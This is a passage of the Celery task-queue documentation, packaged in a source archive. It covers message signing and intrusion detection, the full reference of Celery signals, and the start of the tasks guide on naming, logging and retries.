content-types, so you could also specify the content type for json: .. code-block:: python accept_content = ['application/json'] Celery also comes with a special `auth` serializer that validates communication between Celery clients and workers, making sure that messages originates from trusted sources. Using `Public-key cryptography` the `auth` serializer can verify the authenticity of senders, to enable this read :ref:`message-signing` for more information. .. _`Public-key cryptography`: https://en.wikipedia.org/wiki/Public-key_cryptography .. _message-signing: Message Signing =============== Celery can use the :pypi:`cryptography` library to sign message using `Public-key cryptography`, where messages sent by clients are signed using a private key and then later verified by the worker using a public certificate. Optimally certificates should be signed by an official `Certificate Authority`_, but they can also be self-signed. To enable this you should configure the :setting:`task_serializer` setting to use the `auth` serializer. Enforcing the workers to only accept signed messages, you should set `accept_content` to `['auth']`. For additional signing of the event protocol, set `event_serializer` to `auth`. Also required is configuring the paths used to locate private keys and certificates on the file-system: the :setting:`security_key`, :setting:`security_certificate`, and :setting:`security_cert_store` settings respectively. You can tweak the signing algorithm with :setting:`security_digest`. With these configured it's also necessary to call the :func:`celery.setup_security` function. Note that this will also disable all insecure serializers so that the worker won't accept messages with untrusted content types. This is an example configuration using the `auth` serializer, with the private key and certificate files located in `/etc/ssl`. .. code-block:: python app = Celery() app.conf.update( security_key='/etc/ssl/private/worker.key' security_certificate='/etc/ssl/certs/worker.pem' security_cert_store='/etc/ssl/certs/*.pem', security_digest='sha256', task_serializer='auth', event_serializer='auth', accept_content=['auth'] ) app.setup_security() .. note:: While relative paths aren't disallowed, using absolute paths is recommended for these files. Also note that the `auth` serializer won't encrypt the contents of a message, so if needed this will have to be enabled separately. .. _`X.509`: https://en.wikipedia.org/wiki/X.509 .. _`Certificate Authority`: https://en.wikipedia.org/wiki/Certificate_authority Intrusion Detection =================== The most important part when defending your systems against intruders is being able to detect if the system has been compromised. Logs ---- Logs are usually the first place to look for evidence of security breaches, but they're useless if they can be tampered with. A good solution is to set up centralized logging with a dedicated logging server. Access to it should be restricted. In addition to having all of the logs in a single place, if configured correctly, it can make it harder for intruders to tamper with your logs. This should be fairly easy to setup using syslog (see also `syslog-ng`_ and `rsyslog`_). Celery uses the :mod:`logging` library, and already has support for using syslog. A tip for the paranoid is to send logs using UDP and cut the transmit part of the logging server's network cable :-) .. _`syslog-ng`: https://en.wikipedia.org/wiki/Syslog-ng .. _`rsyslog`: http://www.rsyslog.com/ Tripwire -------- `Tripwire`_ is a (now commercial) data integrity tool, with several open source implementations, used to keep cryptographic hashes of files in the file-system, so that administrators can be alerted when they change. This way when the damage is done and your system has been compromised you can tell exactly what files intruders have changed (password files, logs, back-doors, root-kits, and so on). Often this is the only way you'll be able to detect an intrusion. Some open source implementations include: * `OSSEC`_ * `Samhain`_ * `Open Source Tripwire`_ * `AIDE`_ Also, the `ZFS`_ file-system comes with built-in integrity checks that can be used. .. _`Tripwire`: http://tripwire.com/ .. _`OSSEC`: http://www.ossec.net/ .. _`Samhain`: http://la-samhna.de/samhain/index.html .. _`AIDE`: http://aide.sourceforge.net/ .. _`Open Source Tripwire`: http://sourceforge.net/projects/tripwire/ .. _`ZFS`: https://en.wikipedia.org/wiki/ZFS .. rubric:: Footnotes .. [*] https://blog.nelhage.com/2011/03/exploiting-pickle/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/signals.rst0000664000175000017500000004242500000000000020022 0ustar00asifasif00000000000000.. _signals: ======= Signals ======= .. contents:: :local: Signals allow decoupled applications to receive notifications when certain actions occur elsewhere in the application. Celery ships with many signals that your application can hook into to augment behavior of certain actions. .. _signal-basics: Basics ====== Several kinds of events trigger signals, you can connect to these signals to perform actions as they trigger. Example connecting to the :signal:`after_task_publish` signal: .. code-block:: python from celery.signals import after_task_publish @after_task_publish.connect def task_sent_handler(sender=None, headers=None, body=None, **kwargs): # information about task are located in headers for task messages # using the task protocol version 2. info = headers if 'task' in headers else body print('after_task_publish for task id {info[id]}'.format( info=info, )) Some signals also have a sender you can filter by. For example the :signal:`after_task_publish` signal uses the task name as a sender, so by providing the ``sender`` argument to :class:`~celery.utils.dispatch.signal.Signal.connect` you can connect your handler to be called every time a task with name `"proj.tasks.add"` is published: .. code-block:: python @after_task_publish.connect(sender='proj.tasks.add') def task_sent_handler(sender=None, headers=None, body=None, **kwargs): # information about task are located in headers for task messages # using the task protocol version 2. info = headers if 'task' in headers else body print('after_task_publish for task id {info[id]}'.format( info=info, )) Signals use the same implementation as :mod:`django.core.dispatch`. As a result other keyword parameters (e.g., signal) are passed to all signal handlers by default. The best practice for signal handlers is to accept arbitrary keyword arguments (i.e., ``**kwargs``). That way new Celery versions can add additional arguments without breaking user code. .. _signal-ref: Signals ======= Task Signals ------------ .. signal:: before_task_publish ``before_task_publish`` ~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 3.1 Dispatched before a task is published. Note that this is executed in the process sending the task. Sender is the name of the task being sent. Provides arguments: * ``body`` Task message body. This is a mapping containing the task message fields, see :ref:`message-protocol-task-v2` and :ref:`message-protocol-task-v1` for a reference of possible fields that can be defined. * ``exchange`` Name of the exchange to send to or a :class:`~kombu.Exchange` object. * ``routing_key`` Routing key to use when sending the message. * ``headers`` Application headers mapping (can be modified). * ``properties`` Message properties (can be modified) * ``declare`` List of entities (:class:`~kombu.Exchange`, :class:`~kombu.Queue`, or :class:`~kombu.binding` to declare before publishing the message. Can be modified. * ``retry_policy`` Mapping of retry options. Can be any argument to :meth:`kombu.Connection.ensure` and can be modified. .. signal:: after_task_publish ``after_task_publish`` ~~~~~~~~~~~~~~~~~~~~~~ Dispatched when a task has been sent to the broker. Note that this is executed in the process that sent the task. Sender is the name of the task being sent. Provides arguments: * ``headers`` The task message headers, see :ref:`message-protocol-task-v2` and :ref:`message-protocol-task-v1` for a reference of possible fields that can be defined. * ``body`` The task message body, see :ref:`message-protocol-task-v2` and :ref:`message-protocol-task-v1` for a reference of possible fields that can be defined. * ``exchange`` Name of the exchange or :class:`~kombu.Exchange` object used. * ``routing_key`` Routing key used. .. signal:: task_prerun ``task_prerun`` ~~~~~~~~~~~~~~~ Dispatched before a task is executed. Sender is the task object being executed. Provides arguments: * ``task_id`` Id of the task to be executed. * ``task`` The task being executed. * ``args`` The tasks positional arguments. * ``kwargs`` The tasks keyword arguments. .. signal:: task_postrun ``task_postrun`` ~~~~~~~~~~~~~~~~ Dispatched after a task has been executed. Sender is the task object executed. Provides arguments: * ``task_id`` Id of the task to be executed. * ``task`` The task being executed. * ``args`` The tasks positional arguments. * ``kwargs`` The tasks keyword arguments. * ``retval`` The return value of the task. * ``state`` Name of the resulting state. .. signal:: task_retry ``task_retry`` ~~~~~~~~~~~~~~ Dispatched when a task will be retried. Sender is the task object. Provides arguments: * ``request`` The current task request. * ``reason`` Reason for retry (usually an exception instance, but can always be coerced to :class:`str`). * ``einfo`` Detailed exception information, including traceback (a :class:`billiard.einfo.ExceptionInfo` object). .. signal:: task_success ``task_success`` ~~~~~~~~~~~~~~~~ Dispatched when a task succeeds. Sender is the task object executed. Provides arguments * ``result`` Return value of the task. .. signal:: task_failure ``task_failure`` ~~~~~~~~~~~~~~~~ Dispatched when a task fails. Sender is the task object executed. Provides arguments: * ``task_id`` Id of the task. * ``exception`` Exception instance raised. * ``args`` Positional arguments the task was called with. * ``kwargs`` Keyword arguments the task was called with. * ``traceback`` Stack trace object. * ``einfo`` The :class:`billiard.einfo.ExceptionInfo` instance. ``task_internal_error`` ~~~~~~~~~~~~~~~~~~~~~~~ Dispatched when an internal Celery error occurs while executing the task. Sender is the task object executed. .. signal:: task_internal_error Provides arguments: * ``task_id`` Id of the task. * ``args`` Positional arguments the task was called with. * ``kwargs`` Keyword arguments the task was called with. * ``request`` The original request dictionary. This is provided as the ``task.request`` may not be ready by the time the exception is raised. * ``exception`` Exception instance raised. * ``traceback`` Stack trace object. * ``einfo`` The :class:`billiard.einfo.ExceptionInfo` instance. ``task_received`` ~~~~~~~~~~~~~~~~~ Dispatched when a task is received from the broker and is ready for execution. Sender is the consumer object. .. signal:: task_received Provides arguments: * ``request`` This is a :class:`~celery.worker.request.Request` instance, and not ``task.request``. When using the prefork pool this signal is dispatched in the parent process, so ``task.request`` isn't available and shouldn't be used. Use this object instead, as they share many of the same fields. .. signal:: task_revoked ``task_revoked`` ~~~~~~~~~~~~~~~~ Dispatched when a task is revoked/terminated by the worker. Sender is the task object revoked/terminated. Provides arguments: * ``request`` This is a :class:`~celery.worker.request.Request` instance, and not ``task.request``. When using the prefork pool this signal is dispatched in the parent process, so ``task.request`` isn't available and shouldn't be used. Use this object instead, as they share many of the same fields. * ``terminated`` Set to :const:`True` if the task was terminated. * ``signum`` Signal number used to terminate the task. If this is :const:`None` and terminated is :const:`True` then :sig:`TERM` should be assumed. * ``expired`` Set to :const:`True` if the task expired. .. signal:: task_unknown ``task_unknown`` ~~~~~~~~~~~~~~~~ Dispatched when a worker receives a message for a task that's not registered. Sender is the worker :class:`~celery.worker.consumer.Consumer`. Provides arguments: * ``name`` Name of task not found in registry. * ``id`` The task id found in the message. * ``message`` Raw message object. * ``exc`` The error that occurred. .. signal:: task_rejected ``task_rejected`` ~~~~~~~~~~~~~~~~~ Dispatched when a worker receives an unknown type of message to one of its task queues. Sender is the worker :class:`~celery.worker.consumer.Consumer`. Provides arguments: * ``message`` Raw message object. * ``exc`` The error that occurred (if any). App Signals ----------- .. signal:: import_modules ``import_modules`` ~~~~~~~~~~~~~~~~~~ This signal is sent when a program (worker, beat, shell) etc, asks for modules in the :setting:`include` and :setting:`imports` settings to be imported. Sender is the app instance. Worker Signals -------------- .. signal:: celeryd_after_setup ``celeryd_after_setup`` ~~~~~~~~~~~~~~~~~~~~~~~ This signal is sent after the worker instance is set up, but before it calls run. This means that any queues from the :option:`celery worker -Q` option is enabled, logging has been set up and so on. It can be used to add custom queues that should always be consumed from, disregarding the :option:`celery worker -Q` option. Here's an example that sets up a direct queue for each worker, these queues can then be used to route a task to any specific worker: .. code-block:: python from celery.signals import celeryd_after_setup @celeryd_after_setup.connect def setup_direct_queue(sender, instance, **kwargs): queue_name = '{0}.dq'.format(sender) # sender is the nodename of the worker instance.app.amqp.queues.select_add(queue_name) Provides arguments: * ``sender`` Node name of the worker. * ``instance`` This is the :class:`celery.apps.worker.Worker` instance to be initialized. Note that only the :attr:`app` and :attr:`hostname` (nodename) attributes have been set so far, and the rest of ``__init__`` hasn't been executed. * ``conf`` The configuration of the current app. .. signal:: celeryd_init ``celeryd_init`` ~~~~~~~~~~~~~~~~ This is the first signal sent when :program:`celery worker` starts up. The ``sender`` is the host name of the worker, so this signal can be used to setup worker specific configuration: .. code-block:: python from celery.signals import celeryd_init @celeryd_init.connect(sender='worker12@example.com') def configure_worker12(conf=None, **kwargs): conf.task_default_rate_limit = '10/m' or to set up configuration for multiple workers you can omit specifying a sender when you connect: .. code-block:: python from celery.signals import celeryd_init @celeryd_init.connect def configure_workers(sender=None, conf=None, **kwargs): if sender in ('worker1@example.com', 'worker2@example.com'): conf.task_default_rate_limit = '10/m' if sender == 'worker3@example.com': conf.worker_prefetch_multiplier = 0 Provides arguments: * ``sender`` Nodename of the worker. * ``instance`` This is the :class:`celery.apps.worker.Worker` instance to be initialized. Note that only the :attr:`app` and :attr:`hostname` (nodename) attributes have been set so far, and the rest of ``__init__`` hasn't been executed. * ``conf`` The configuration of the current app. * ``options`` Options passed to the worker from command-line arguments (including defaults). .. signal:: worker_init ``worker_init`` ~~~~~~~~~~~~~~~ Dispatched before the worker is started. .. signal:: worker_ready ``worker_ready`` ~~~~~~~~~~~~~~~~ Dispatched when the worker is ready to accept work. .. signal:: heartbeat_sent ``heartbeat_sent`` ~~~~~~~~~~~~~~~~~~ Dispatched when Celery sends a worker heartbeat. Sender is the :class:`celery.worker.heartbeat.Heart` instance. .. signal:: worker_shutting_down ``worker_shutting_down`` ~~~~~~~~~~~~~~~~~~~~~~~~ Dispatched when the worker begins the shutdown process. Provides arguments: * ``sig`` The POSIX signal that was received. * ``how`` The shutdown method, warm or cold. * ``exitcode`` The exitcode that will be used when the main process exits. .. signal:: worker_process_init ``worker_process_init`` ~~~~~~~~~~~~~~~~~~~~~~~ Dispatched in all pool child processes when they start. Note that handlers attached to this signal mustn't be blocking for more than 4 seconds, or the process will be killed assuming it failed to start. .. signal:: worker_process_shutdown ``worker_process_shutdown`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dispatched in all pool child processes just before they exit. Note: There's no guarantee that this signal will be dispatched, similarly to :keyword:`finally` blocks it's impossible to guarantee that handlers will be called at shutdown, and if called it may be interrupted during. Provides arguments: * ``pid`` The pid of the child process that's about to shutdown. * ``exitcode`` The exitcode that'll be used when the child process exits. .. signal:: worker_shutdown ``worker_shutdown`` ~~~~~~~~~~~~~~~~~~~ Dispatched when the worker is about to shut down. Beat Signals ------------ .. signal:: beat_init ``beat_init`` ~~~~~~~~~~~~~ Dispatched when :program:`celery beat` starts (either standalone or embedded). Sender is the :class:`celery.beat.Service` instance. .. signal:: beat_embedded_init ``beat_embedded_init`` ~~~~~~~~~~~~~~~~~~~~~~ Dispatched in addition to the :signal:`beat_init` signal when :program:`celery beat` is started as an embedded process. Sender is the :class:`celery.beat.Service` instance. Eventlet Signals ---------------- .. signal:: eventlet_pool_started ``eventlet_pool_started`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Sent when the eventlet pool has been started. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. .. signal:: eventlet_pool_preshutdown ``eventlet_pool_preshutdown`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sent when the worker shutdown, just before the eventlet pool is requested to wait for remaining workers. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. .. signal:: eventlet_pool_postshutdown ``eventlet_pool_postshutdown`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sent when the pool has been joined and the worker is ready to shutdown. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. .. signal:: eventlet_pool_apply ``eventlet_pool_apply`` ~~~~~~~~~~~~~~~~~~~~~~~ Sent whenever a task is applied to the pool. Sender is the :class:`celery.concurrency.eventlet.TaskPool` instance. Provides arguments: * ``target`` The target function. * ``args`` Positional arguments. * ``kwargs`` Keyword arguments. Logging Signals --------------- .. signal:: setup_logging ``setup_logging`` ~~~~~~~~~~~~~~~~~ Celery won't configure the loggers if this signal is connected, so you can use this to completely override the logging configuration with your own. If you'd like to augment the logging configuration setup by Celery then you can use the :signal:`after_setup_logger` and :signal:`after_setup_task_logger` signals. Provides arguments: * ``loglevel`` The level of the logging object. * ``logfile`` The name of the logfile. * ``format`` The log format string. * ``colorize`` Specify if log messages are colored or not. .. signal:: after_setup_logger ``after_setup_logger`` ~~~~~~~~~~~~~~~~~~~~~~ Sent after the setup of every global logger (not task loggers). Used to augment logging configuration. Provides arguments: * ``logger`` The logger object. * ``loglevel`` The level of the logging object. * ``logfile`` The name of the logfile. * ``format`` The log format string. * ``colorize`` Specify if log messages are colored or not. .. signal:: after_setup_task_logger ``after_setup_task_logger`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sent after the setup of every single task logger. Used to augment logging configuration. Provides arguments: * ``logger`` The logger object. * ``loglevel`` The level of the logging object. * ``logfile`` The name of the logfile. * ``format`` The log format string. * ``colorize`` Specify if log messages are colored or not. Command signals --------------- .. signal:: user_preload_options ``user_preload_options`` ~~~~~~~~~~~~~~~~~~~~~~~~ This signal is sent after any of the Celery command line programs are finished parsing the user preload options. It can be used to add additional command-line arguments to the :program:`celery` umbrella command: .. code-block:: python from celery import Celery from celery import signals from celery.bin.base import Option app = Celery() app.user_options['preload'].add(Option( '--monitoring', action='store_true', help='Enable our external monitoring utility, blahblah', )) @signals.user_preload_options.connect def handle_preload_options(options, **kwargs): if options['monitoring']: enable_monitoring() Sender is the :class:`~celery.bin.base.Command` instance, and the value depends on the program that was called (e.g., for the umbrella command it'll be a :class:`~celery.bin.celery.CeleryCommand`) object). Provides arguments: * ``app`` The app instance. * ``options`` Mapping of the parsed user preload options (with default values). Deprecated Signals ------------------ .. signal:: task_sent ``task_sent`` ~~~~~~~~~~~~~ This signal is deprecated, please use :signal:`after_task_publish` instead. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/sphinx.rst0000664000175000017500000000053100000000000017663 0ustar00asifasif00000000000000.. _sphinx: ============================== Documenting Tasks with Sphinx ============================== This document describes how auto-generate documentation for Tasks using Sphinx. -------------------------------- celery.contrib.sphinx -------------------------------- .. automodule:: celery.contrib.sphinx :members: :noindex: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/tasks.rst0000664000175000017500000017442300000000000017513 0ustar00asifasif00000000000000.. _guide-tasks: ===================================================================== Tasks ===================================================================== Tasks are the building blocks of Celery applications. A task is a class that can be created out of any callable. It performs dual roles in that it defines both what happens when a task is called (sends a message), and what happens when a worker receives that message. Every task class has a unique name, and this name is referenced in messages so the worker can find the right function to execute. A task message is not removed from the queue until that message has been :term:`acknowledged` by a worker. A worker can reserve many messages in advance and even if the worker is killed -- by power failure or some other reason -- the message will be redelivered to another worker. Ideally task functions should be :term:`idempotent`: meaning the function won't cause unintended effects even if called multiple times with the same arguments. Since the worker cannot detect if your tasks are idempotent, the default behavior is to acknowledge the message in advance, just before it's executed, so that a task invocation that already started is never executed again. If your task is idempotent you can set the :attr:`~Task.acks_late` option to have the worker acknowledge the message *after* the task returns instead. See also the FAQ entry :ref:`faq-acks_late-vs-retry`. Note that the worker will acknowledge the message if the child process executing the task is terminated (either by the task calling :func:`sys.exit`, or by signal) even when :attr:`~Task.acks_late` is enabled. This behavior is intentional as... #. We don't want to rerun tasks that forces the kernel to send a :sig:`SIGSEGV` (segmentation fault) or similar signals to the process. #. We assume that a system administrator deliberately killing the task does not want it to automatically restart. #. A task that allocates too much memory is in danger of triggering the kernel OOM killer, the same may happen again. #. A task that always fails when redelivered may cause a high-frequency message loop taking down the system. If you really want a task to be redelivered in these scenarios you should consider enabling the :setting:`task_reject_on_worker_lost` setting. .. warning:: A task that blocks indefinitely may eventually stop the worker instance from doing any other work. If your task does I/O then make sure you add timeouts to these operations, like adding a timeout to a web request using the :pypi:`requests` library: .. code-block:: python connect_timeout, read_timeout = 5.0, 30.0 response = requests.get(URL, timeout=(connect_timeout, read_timeout)) :ref:`Time limits ` are convenient for making sure all tasks return in a timely manner, but a time limit event will actually kill the process by force so only use them to detect cases where you haven't used manual timeouts yet. In previous versions, the default prefork pool scheduler was not friendly to long-running tasks, so if you had tasks that ran for minutes/hours, it was advised to enable the :option:`-Ofair ` command-line argument to the :program:`celery worker`. However, as of version 4.0, -Ofair is now the default scheduling strategy. See :ref:`optimizing-prefetch-limit` for more information, and for the best performance route long-running and short-running tasks to dedicated workers (:ref:`routing-automatic`). If your worker hangs then please investigate what tasks are running before submitting an issue, as most likely the hanging is caused by one or more tasks hanging on a network operation. -- In this chapter you'll learn all about defining tasks, and this is the **table of contents**: .. contents:: :local: :depth: 1 .. _task-basics: Basics ====== You can easily create a task from any callable by using the :meth:`@task` decorator: .. code-block:: python from .models import User @app.task def create_user(username, password): User.objects.create(username=username, password=password) There are also many :ref:`options ` that can be set for the task, these can be specified as arguments to the decorator: .. code-block:: python @app.task(serializer='json') def create_user(username, password): User.objects.create(username=username, password=password) .. sidebar:: How do I import the task decorator? And what's "app"? The task decorator is available on your :class:`@Celery` application instance, if you don't know what this is then please read :ref:`first-steps`. If you're using Django (see :ref:`django-first-steps`), or you're the author of a library then you probably want to use the :func:`@shared_task` decorator: .. code-block:: python from celery import shared_task @shared_task def add(x, y): return x + y .. sidebar:: Multiple decorators When using multiple decorators in combination with the task decorator you must make sure that the `task` decorator is applied last (oddly, in Python this means it must be first in the list): .. code-block:: python @app.task @decorator2 @decorator1 def add(x, y): return x + y Bound tasks ----------- A task being bound means the first argument to the task will always be the task instance (``self``), just like Python bound methods: .. code-block:: python logger = get_task_logger(__name__) @app.task(bind=True) def add(self, x, y): logger.info(self.request.id) Bound tasks are needed for retries (using :meth:`Task.retry() <@Task.retry>`), for accessing information about the current task request, and for any additional functionality you add to custom task base classes. Task inheritance ---------------- The ``base`` argument to the task decorator specifies the base class of the task: .. code-block:: python import celery class MyTask(celery.Task): def on_failure(self, exc, task_id, args, kwargs, einfo): print('{0!r} failed: {1!r}'.format(task_id, exc)) @app.task(base=MyTask) def add(x, y): raise KeyError() .. _task-names: Names ===== Every task must have a unique name. If no explicit name is provided the task decorator will generate one for you, and this name will be based on 1) the module the task is defined in, and 2) the name of the task function. Example setting explicit name: .. code-block:: pycon >>> @app.task(name='sum-of-two-numbers') >>> def add(x, y): ... return x + y >>> add.name 'sum-of-two-numbers' A best practice is to use the module name as a name-space, this way names won't collide if there's already a task with that name defined in another module. .. code-block:: pycon >>> @app.task(name='tasks.add') >>> def add(x, y): ... return x + y You can tell the name of the task by investigating its ``.name`` attribute: .. code-block:: pycon >>> add.name 'tasks.add' The name we specified here (``tasks.add``) is exactly the name that would've been automatically generated for us if the task was defined in a module named :file:`tasks.py`: :file:`tasks.py`: .. code-block:: python @app.task def add(x, y): return x + y .. code-block:: pycon >>> from tasks import add >>> add.name 'tasks.add' .. _task-name-generator-info: Changing the automatic naming behavior -------------------------------------- .. versionadded:: 4.0 There are some cases when the default automatic naming isn't suitable. Consider having many tasks within many different modules:: project/ /__init__.py /celery.py /moduleA/ /__init__.py /tasks.py /moduleB/ /__init__.py /tasks.py Using the default automatic naming, each task will have a generated name like `moduleA.tasks.taskA`, `moduleA.tasks.taskB`, `moduleB.tasks.test`, and so on. You may want to get rid of having `tasks` in all task names. As pointed above, you can explicitly give names for all tasks, or you can change the automatic naming behavior by overriding :meth:`@gen_task_name`. Continuing with the example, `celery.py` may contain: .. code-block:: python from celery import Celery class MyCelery(Celery): def gen_task_name(self, name, module): if module.endswith('.tasks'): module = module[:-6] return super().gen_task_name(name, module) app = MyCelery('main') So each task will have a name like `moduleA.taskA`, `moduleA.taskB` and `moduleB.test`. .. warning:: Make sure that your :meth:`@gen_task_name` is a pure function: meaning that for the same input it must always return the same output. .. _task-request-info: Task Request ============ :attr:`Task.request <@Task.request>` contains information and state related to the currently executing task. The request defines the following attributes: :id: The unique id of the executing task. :group: The unique id of the task's :ref:`group `, if this task is a member. :chord: The unique id of the chord this task belongs to (if the task is part of the header). :correlation_id: Custom ID used for things like de-duplication. :args: Positional arguments. :kwargs: Keyword arguments. :origin: Name of host that sent this task. :retries: How many times the current task has been retried. An integer starting at `0`. :is_eager: Set to :const:`True` if the task is executed locally in the client, not by a worker. :eta: The original ETA of the task (if any). This is in UTC time (depending on the :setting:`enable_utc` setting). :expires: The original expiry time of the task (if any). This is in UTC time (depending on the :setting:`enable_utc` setting). :hostname: Node name of the worker instance executing the task. :delivery_info: Additional message delivery information. This is a mapping containing the exchange and routing key used to deliver this task. Used by for example :meth:`Task.retry() <@Task.retry>` to resend the task to the same destination queue. Availability of keys in this dict depends on the message broker used. :reply-to: Name of queue to send replies back to (used with RPC result backend for example). :called_directly: This flag is set to true if the task wasn't executed by the worker. :timelimit: A tuple of the current ``(soft, hard)`` time limits active for this task (if any). :callbacks: A list of signatures to be called if this task returns successfully. :errback: A list of signatures to be called if this task fails. :utc: Set to true the caller has UTC enabled (:setting:`enable_utc`). .. versionadded:: 3.1 :headers: Mapping of message headers sent with this task message (may be :const:`None`). :reply_to: Where to send reply to (queue name). :correlation_id: Usually the same as the task id, often used in amqp to keep track of what a reply is for. .. versionadded:: 4.0 :root_id: The unique id of the first task in the workflow this task is part of (if any). :parent_id: The unique id of the task that called this task (if any). :chain: Reversed list of tasks that form a chain (if any). The last item in this list will be the next task to succeed the current task. If using version one of the task protocol the chain tasks will be in ``request.callbacks`` instead. .. versionadded:: 5.2 :properties: Mapping of message properties received with this task message (may be :const:`None` or :const:`{}`) :replaced_task_nesting: How many times the task was replaced, if at all. (may be :const:`0`) Example ------- An example task accessing information in the context is: .. code-block:: python @app.task(bind=True) def dump_context(self, x, y): print('Executing task id {0.id}, args: {0.args!r} kwargs: {0.kwargs!r}'.format( self.request)) The ``bind`` argument means that the function will be a "bound method" so that you can access attributes and methods on the task type instance. .. _task-logging: Logging ======= The worker will automatically set up logging for you, or you can configure logging manually. A special logger is available named "celery.task", you can inherit from this logger to automatically get the task name and unique id as part of the logs. The best practice is to create a common logger for all of your tasks at the top of your module: .. code-block:: python from celery.utils.log import get_task_logger logger = get_task_logger(__name__) @app.task def add(x, y): logger.info('Adding {0} + {1}'.format(x, y)) return x + y Celery uses the standard Python logger library, and the documentation can be found :mod:`here `. You can also use :func:`print`, as anything written to standard out/-err will be redirected to the logging system (you can disable this, see :setting:`worker_redirect_stdouts`). .. note:: The worker won't update the redirection if you create a logger instance somewhere in your task or task module. If you want to redirect ``sys.stdout`` and ``sys.stderr`` to a custom logger you have to enable this manually, for example: .. code-block:: python import sys logger = get_task_logger(__name__) @app.task(bind=True) def add(self, x, y): old_outs = sys.stdout, sys.stderr rlevel = self.app.conf.worker_redirect_stdouts_level try: self.app.log.redirect_stdouts_to_logger(logger, rlevel) print('Adding {0} + {1}'.format(x, y)) return x + y finally: sys.stdout, sys.stderr = old_outs .. note:: If a specific Celery logger you need is not emitting logs, you should check that the logger is propagating properly. In this example "celery.app.trace" is enabled so that "succeeded in" logs are emitted: .. code-block:: python import celery import logging @celery.signals.after_setup_logger.connect def on_after_setup_logger(**kwargs): logger = logging.getLogger('celery') logger.propagate = True logger = logging.getLogger('celery.app.trace') logger.propagate = True .. note:: If you want to completely disable Celery logging configuration, use the :signal:`setup_logging` signal: .. code-block:: python import celery @celery.signals.setup_logging.connect def on_setup_logging(**kwargs): pass .. _task-argument-checking: Argument checking ----------------- .. versionadded:: 4.0 Celery will verify the arguments passed when you call the task, just like Python does when calling a normal function: .. code-block:: pycon >>> @app.task ... def add(x, y): ... return x + y # Calling the task with two arguments works: >>> add.delay(8, 8) # Calling the task with only one argument fails: >>> add.delay(8) Traceback (most recent call last): File "", line 1, in File "celery/app/task.py", line 376, in delay return self.apply_async(args, kwargs) File "celery/app/task.py", line 485, in apply_async check_arguments(*(args or ()), **(kwargs or {})) TypeError: add() takes exactly 2 arguments (1 given) You can disable the argument checking for any task by setting its :attr:`~@Task.typing` attribute to :const:`False`: .. code-block:: pycon >>> @app.task(typing=False) ... def add(x, y): ... return x + y # Works locally, but the worker receiving the task will raise an error. >>> add.delay(8) .. _task-hiding-sensitive-information: Hiding sensitive information in arguments ----------------------------------------- .. versionadded:: 4.0 When using :setting:`task_protocol` 2 or higher (default since 4.0), you can override how positional arguments and keyword arguments are represented in logs and monitoring events using the ``argsrepr`` and ``kwargsrepr`` calling arguments: .. code-block:: pycon >>> add.apply_async((2, 3), argsrepr='(, )') >>> charge.s(account, card='1234 5678 1234 5678').set( ... kwargsrepr=repr({'card': '**** **** **** 5678'}) ... ).delay() .. warning:: Sensitive information will still be accessible to anyone able to read your task message from the broker, or otherwise able intercept it. For this reason you should probably encrypt your message if it contains sensitive information, or in this example with a credit card number the actual number could be stored encrypted in a secure store that you retrieve and decrypt in the task itself. .. _task-retry: Retrying ======== :meth:`Task.retry() <@Task.retry>` can be used to re-execute the task, for example in the event of recoverable errors. When you call ``retry`` it'll send a new message, using the same task-id, and it'll take care to make sure the message is delivered to the same queue as the originating task. When a task is retried this is also recorded as a task state, so that you can track the progress of the task using the result instance (see :ref:`task-states`). Here's an example using ``retry``: .. code-block:: python @app.task(bind=True) def send_twitter_status(self, oauth, tweet): try: twitter = Twitter(oauth) twitter.update_status(tweet) except (Twitter.FailWhaleError, Twitter.LoginError) as exc: raise self.retry(exc=exc) .. note:: The :meth:`Task.retry() <@Task.retry>` call will raise an exception so any code after the retry won't be reached. This is the :exc:`~@Retry` exception, it isn't handled as an error but rather as a semi-predicate to signify to the worker that the task is to be retried, so that it can store the correct state when a result backend is enabled. This is normal operation and always happens unless the ``throw`` argument to retry is set to :const:`False`. The bind argument to the task decorator will give access to ``self`` (the task type instance). The ``exc`` argument is used to pass exception information that's used in logs, and when storing task results. Both the exception and the traceback will be available in the task state (if a result backend is enabled). If the task has a ``max_retries`` value the current exception will be re-raised if the max number of retries has been exceeded, but this won't happen if: - An ``exc`` argument wasn't given. In this case the :exc:`~@MaxRetriesExceededError` exception will be raised. - There's no current exception If there's no original exception to re-raise the ``exc`` argument will be used instead, so: .. code-block:: python self.retry(exc=Twitter.LoginError()) will raise the ``exc`` argument given. .. _task-retry-custom-delay: Using a custom retry delay -------------------------- When a task is to be retried, it can wait for a given amount of time before doing so, and the default delay is defined by the :attr:`~@Task.default_retry_delay` attribute. By default this is set to 3 minutes. Note that the unit for setting the delay is in seconds (int or float). You can also provide the `countdown` argument to :meth:`~@Task.retry` to override this default. .. code-block:: python @app.task(bind=True, default_retry_delay=30 * 60) # retry in 30 minutes. def add(self, x, y): try: something_raising() except Exception as exc: # overrides the default delay to retry after 1 minute raise self.retry(exc=exc, countdown=60) .. _task-autoretry: Automatic retry for known exceptions ------------------------------------ .. versionadded:: 4.0 Sometimes you just want to retry a task whenever a particular exception is raised. Fortunately, you can tell Celery to automatically retry a task using `autoretry_for` argument in the :meth:`@task` decorator: .. code-block:: python from twitter.exceptions import FailWhaleError @app.task(autoretry_for=(FailWhaleError,)) def refresh_timeline(user): return twitter.refresh_timeline(user) If you want to specify custom arguments for an internal :meth:`~@Task.retry` call, pass `retry_kwargs` argument to :meth:`@task` decorator: .. code-block:: python @app.task(autoretry_for=(FailWhaleError,), retry_kwargs={'max_retries': 5}) def refresh_timeline(user): return twitter.refresh_timeline(user) This is provided as an alternative to manually handling the exceptions, and the example above will do the same as wrapping the task body in a 